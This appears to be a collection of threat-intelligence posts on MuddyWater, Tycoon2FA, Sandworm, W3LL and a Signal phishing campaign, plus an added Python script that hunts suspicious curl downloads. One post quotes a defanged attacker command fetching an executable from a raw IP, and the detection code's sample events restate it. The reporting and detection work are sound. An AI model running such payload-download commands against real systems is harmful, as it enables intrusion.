Detecting #Tycoon2FA AiTM attacks across Entra ID and Google Workspace. We map telemetry fingerprints across both platforms, ship detection rules for both tiers, and contain incidents in under 10 seconds with Elastic Workflows.
https://t.co/mSxH6m0bGB
Very interesting discovery & assessment: Iran’s MuddyWater APT observed using Chaos Ransomware.
One key piece of context the R7 blog missed, however, is that MuddyWater has been around a long time and was found to use Thanos ransomware several years ago: https://t.co/TQ9RF8ql10
In early 2026, MuddyWater (Seedworm), an Iranian state-backed threat group, operated under the banner of the Chaos ransomware-as-a-service (RaaS) group, using it to obfuscate ransomware attacks. Microsoft Teams was the main attack vector, where they used interactive screen-sharing to:
• Harvest credentials
• Manipulate Multi-Factor Authentication (MFA)
Initial attribution comes from MuddyWater adopting alternative ransomware branding, in an effort to reduce attribution and maintain plausible deniability. The apparent absence of file encryption represents a deviation from typical ransomware behavior; this inconsistency indicates that the ransomware component may have functioned primarily as a facilitating or obfuscation mechanism.
Initial access came from leveraging Microsoft Teams, where the threat actor engaged employees through external chat requests, using an interactive screen-sharing exploit to compromise users. The attacker then conducted initial discovery, harvested credentials, including MFA manipulation, and quickly transitioned to using legitimate accounts for internal access.
They then established persistence using remote access tools such as `DWAgent` and `AnyDesk`, before deploying additional payloads and gaining further control of the environment. The TA would later execute commands via `RDP` to download additional payloads using curl:
• `curl hxxp[://]172.86.126[.]208:443/ms_upd[.]exe -o C:\ProgramData\ms_upd[.]exe`
Following this, the TA exfiltrated data from the compromised environment and subsequently contacted the victim via email, claiming data theft and initiating ransom negotiations.
The assessed link to MuddyWater indicates a continued evolution in the group’s operational approach, including the apparent use of RaaS ecosystems and branding to obscure attribution. This aligns with broader trends in which state-aligned actors adopt criminal tactics to introduce ambiguity and delay defensive response.
#ThreatIntel #Cyber #CyberSecurity #CyberSecurityNews #APT #IranAPT #IranWar
https://t.co/uljjmrRvPX
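As an added defender-side example (not from the post above or its sources), the Python below scores constructed Sysmon-style process-creation events for the curl download pattern the post describes: a raw-IP URL, plaintext HTTP on port 443, an executable written to C:\ProgramData, launched from cmd.exe inside an RDP (logon type 10) session. The IP, hostnames and paths in the sample events are constructed placeholders, not indicators from the post.

```python
import re
from typing import Dict, List

# Constructed Sysmon EventID 1-style events (not real telemetry).
# logon_type 10 == RemoteInteractive (RDP), matching "commands via RDP" in the post.
SAMPLE_EVENTS: List[Dict] = [
    {"host": "WS-014", "parent": r"C:\Windows\System32\cmd.exe", "logon_type": 10,
     "cmdline": r"curl http://203.0.113.45:443/ms_upd.exe -o C:\ProgramData\ms_upd.exe"},
    {"host": "WS-021", "parent": r"C:\Windows\explorer.exe", "logon_type": 2,
     "cmdline": r"curl https://pkgs.example.com/tool.zip -o C:\Users\jdoe\Downloads\tool.zip"},
    {"host": "SRV-02", "parent": r"C:\Windows\System32\cmd.exe", "logon_type": 10,
     "cmdline": r"curl.exe -s http://10.0.4.7/health"},
]

URL_RE = re.compile(r"\bhttps?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/\S*", re.I)  # URL with a raw IP host
OUT_RE = re.compile(r"(?:^|\s)(?:-o|--output)\s+(\S+)", re.I)                 # curl output path
STAGING_DIRS = (r"c:\programdata", r"c:\users\public", r"c:\windows\temp", r"c:\temp")
EXEC_EXT = (".exe", ".dll", ".ps1", ".bat", ".vbs", ".msi")

def analyze_event(ev: Dict) -> List[str]:
    """Return the suspicious traits a single curl invocation exhibits (empty if not curl)."""
    cmd = ev["cmdline"]
    image = cmd.split()[0].rsplit("\\", 1)[-1].lower()   # strip any leading path
    if image not in ("curl", "curl.exe"):
        return []
    reasons: List[str] = []
    url = URL_RE.search(cmd)
    if url:
        reasons.append("download from raw IP address")
        scheme, hostport = url.group(0).split("://", 1)[0], url.group(0).split("://", 1)[1].split("/", 1)[0]
        port = hostport.rpartition(":")[2] if ":" in hostport else ""
        if scheme.lower() == "http" and port == "443":
            reasons.append("plaintext http on port 443")   # TLS port without TLS: odd for legit tooling
    out = OUT_RE.search(cmd)
    if out:
        path = out.group(1).strip('"').lower()
        if path.startswith(STAGING_DIRS):
            reasons.append("output written to system staging dir")
        if path.endswith(EXEC_EXT):
            reasons.append("output is an executable artifact")
    if ev.get("logon_type") == 10 and ev.get("parent", "").lower().endswith(r"\cmd.exe"):
        reasons.append("launched from cmd.exe in an RDP session")
    return reasons

def hunt(events: List[Dict], min_hits: int = 3) -> List[Dict]:
    """Flag events stacking at least min_hits traits; a single trait alone is normal admin noise."""
    hits = []
    for ev in events:
        reasons = analyze_event(ev)
        if len(reasons) >= min_hits:
            hits.append({"host": ev["host"], "reasons": reasons})
    return hits

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["host"], "->", "; ".join(hit["reasons"]))
```

The threshold keeps a plain `curl http://10.0.4.7/health` health check from alerting while the staged-executable download trips five traits at once.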
@Ced_haurus@fuitesinfos So, alerting for the sake of alerting.... Especially since many are trying to build a reputation and want their "exploits" to be relayed and go viral. Grabbing stealer logs and DBs while merely repeating the TAs' narrative adds nothing.
@Ced_haurus@fuitesinfos Sorry, but I have only very rarely (if ever) seen real triage work on leaks or alleged leaks. A junior CTI analyst knows that many of the people who populate forums and other marketplaces reuse leaks.
UNC6692 is impersonating IT helpdesk employees on Microsoft Teams to deploy custom malware.
The SNOW ecosystem (SNOWBELT, SNOWGLAZE, SNOWBASIN) enables deep network penetration and exfiltration. Read the analysis and get indicators of compromise.
➡️ https://t.co/vnHZVuNWi2
A response to recent reporting in Germany, in service of clarity and accountability:
First, it’s important to be precise when it comes to critical infrastructure like Signal. Signal was not “hacked” — in that our encryption, infrastructure, and the integrity of the app’s code was not compromised.
However, sophisticated attackers have engaged in a harmful phishing campaign, posing as “Signal Support” by changing their profile display name and using social engineering to trick people into handing over their credentials — information that allowed these attackers to take over some targeted Signal accounts. This is something that plagues any mainstream messaging app once it reaches the scale of Signal, but we know how high the stakes are given the trust people place in us.
In the coming weeks, you’ll see us rolling out a number of changes to help hinder these kinds of attacks.
Because we don’t collect user data, what we know about these attacks comes from the victims of phishing. And from what victims have told us, the attacks followed a broad pattern: after tricking people into revealing their Signal credentials, attackers then used those credentials to take over their account and also frequently changed the associated phone number. Because such a change results in de-registering your Signal accounts, attackers prepared people for this by telling them that being de-registered was intended behavior, and that all they would need to do is “re-register,” or, create a new account. When they moved to create a new Signal account — one that was now decoupled from their hijacked account — the victims thought they were logging back in to their primary account. As a result, many didn't notice the takeover. The compromised accounts were then weaponized to target the victims' contact lists by posing as the owners of the account.
We understand the trust that people put in Signal, and how devastating this kind of social engineering can be. While it’s true that all messaging platforms are susceptible to scammers and phishing that betrays people’s trust and convinces them to “unlock the front door” where no backdoor exists, we are looking to do everything we can to help people avoid and detect such scams.
For the time being, please stay vigilant against phishing and account takeover attempts. Remember that no one from Signal Support will ever send you a message request or ask for your registration verification code or Signal PIN. For an added layer of protection, you can enable Registration Lock in your Signal Settings (Account -> Registration Lock).
We are launching our threat intelligence feeds and we’re making them free for the first year for our enterprise customers with access to our threat hunting labs!
Indicators across Windows, Linux and macOS intrusions🥳
Low noise, high fidelity, plug-and-play point 👇
For over seven years, the #W3LL phishing empire powered a closed community of 500+ cybercriminals with an AiTM #phishing kit called W3LL Panel (aka OV6 panel). Designed specifically to harvest session cookies, validate credentials, and bypass MFA on Microsoft 365 accounts, the kit featured token‑based license activation, a custom API, anti‑bot mechanisms, and obfuscated source code, turning #BEC into a scalable service. #ThreatIntel
.@joswr1ght just announced a 720-page modern incident response book. 18 months in the making. The first comprehensive update to foundational IR frameworks since 2001. Released to the community for free. “Someone asked me, ‘Do you like writing?’ I say, ‘No, I like having written.’ That’s a different thing altogether. But I wrote this book because I kept seeing the same problems over and over again.” This is what giving back looks like.
➡️ Details in the RSAC deep dive: https://t.co/0XGzso8Yfz
@OneRSAC | #RSAC #Cybersecurity #ThreatIntel #IncidentResponse
Krypt3ia looks at a MuddyWater (Mango Sandstorm) espionage campaign that looks like a strategic pre-positioning and intelligence collection operation. Synaptics also looks at the group's Telegram naming patterns.
https://t.co/8cNwyliGUA
#Sandworm Targeted RDP Backdoor Campaign (2024-2026)
The group has fully evolved its operational strategy from high-impact instantaneous system destruction to intelligence-driven, long-term stealthy persistence.
The campaign leverages a highly modular, iterated attack framework (Tambur/Sumbur/Kalambur/DemiMur) targeting global defense industry, critical infrastructure, and government entities.
https://t.co/LpeBlBSdsl
Multiple samples targeting government, defense, and diplomatic themes across Algeria, Mongolia, Ukraine, and Kuwait within a short period of time. The attackers rely on ZIP archives with lure documents to initiate the infection chain.
https://t.co/RrxKxA7fuv
New blog! We found an open directory attributed to #MuddyWater Iranian APT and found vulnerabilities/victims they've been targeting, red-team tools, and a loader that deploys a persistent variant of #Tsundere botnet - a MaaS sold by a Russian threat actor that is known for using #EtherHiding to store C2 addresses on the Ethereum blockchain.
https://t.co/45X2IIlkgB